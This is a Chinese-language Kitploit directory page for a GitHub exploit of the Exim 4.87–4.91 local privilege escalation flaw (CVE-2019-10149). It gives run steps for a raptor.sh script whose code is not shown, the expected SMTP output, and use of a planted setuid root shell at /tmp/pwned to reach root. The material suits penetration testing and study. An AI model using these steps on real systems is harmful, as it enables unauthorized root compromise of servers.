Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-10149-Exim4-RCE — 针对Exim 4.87-4.91的本地权限提升漏洞利用(CVE-2019-10149)。通过精心构造的SMTP命令交付一个setuid root shell辅助程序,使标准用户能够提升权限至root。 | Kitploit
工具/GitHubGitHub/cybersrmutl/cve-2019-10149-exim4-rce
权限提升漏洞分析漏洞利用后渗透利用渗透测试红队
GitHubcybersrmutl/cve-2019-10149-exim4-rce

CVE-2019-10149-Exim4-RCE

针对Exim 4.87-4.91的本地权限提升漏洞利用(CVE-2019-10149)。通过精心构造的SMTP命令交付一个setuid root shell辅助程序,使标准用户能够提升权限至root。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
68个月前尚未审核

Cr.Exim 4.87 - 4.91 - 本地权限提升

Cr.Link: https://www.exploit-db.com/exploits/46996

#1.此方法要求您首先以标准用户权限访问目标机器。

#2.一旦您访问了目标机器,请创建一个包含以下内容的脚本文件:

vi raptor.sh

#3.从提供的 'raptor.sh' 文件中复制代码。然后,使用以下命令执行该文件:

chmod +x raptor.sh

./raptor.sh

#4.您应收到类似以下示例的输出:

Preparing setuid shell helper...

Delivering payload...

220 machine-noob

ESMTP Exim 4.89 Wed, 03 Dec 2025 08:29:29 +0000

250 machine-noob

Hello localhost [127.0.0.1]

250 OK

250 Accepted

354 Enter message, ending with "." on a line by itself

250 OK id=1vQiEr-00001R-7t

221 machine-noob

closing connection

Waiting 5 seconds for Exim to execute payload...

-rwsr-xr-x 1 root noob 8392 Dec 3 08:29 /tmp/pwned

#5.接下来,执行以下命令:

/tmp/pwned

#6.然后,尝试运行 'id' 命令。如果您看到以下结果:

uid=0(root) gid=0(root) groups=0(root),1001(noob)

下载工具